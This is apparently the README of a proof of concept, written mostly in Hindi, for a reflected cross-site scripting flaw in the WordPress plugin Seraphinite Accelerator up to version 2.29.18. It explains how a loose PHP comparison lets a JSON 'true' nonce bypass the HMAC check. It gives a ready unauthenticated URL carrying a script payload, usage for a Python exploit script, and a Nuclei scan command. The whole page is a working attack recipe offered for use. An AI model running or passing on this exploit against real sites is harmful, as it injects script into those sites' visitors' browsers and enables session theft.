
Seraphinite Accelerator <= 2.29.18 - परावर्तित क्रॉस-साइट स्क्रिप्टिंग PoC
प्लगइन अपने आंतरिक "prepare page" अनुरोधों को seraph_accel_prep पैरामीटर (base64-encoded JSON) में HMAC से साइन करता है, लेकिन उसकी तुलना PHP के ढीले != से करता है। nonce के रूप में JSON बूलियन true भेजने पर तुलना हमेशा सफल होती है, और फिर selfTest फ़ील्ड को बिना escape किए selfTest-<value> के रूप में वापस प्रतिध्वनित किया जाता है।
एक URL, कोई प्रमाणीकरण नहीं:
http://TARGET/?seraph_accel_prep=<base64 of {"_tm":"1","nonce":true,"selfTest":"<script>alert(document.domain)</script>"}>
पायथन (pip install requests की आवश्यकता है):
usage: seraph_accel_xss.py [-h] --url URL [--payload PAYLOAD] [--timeout TIMEOUT]
Seraphinite Accelerator (WordPress) <= 2.29.18
options:
-h, --help show this help message and exit
--url URL target site, e.g. http://target-site.com
--payload PAYLOAD XSS payload (default: <script>alert(document.domain)</script>)
--timeout TIMEOUT seconds (default: 30)
Nuclei:
nuclei -u http://target-site.com -t seraphinite-accelerator-prep-xss.yaml -timeout 10
-timeout 10 की आवश्यकता इसलिए है क्योंकि कमजोर कोड पथ उत्तर देने से पहले 5 सेकंड सोता है।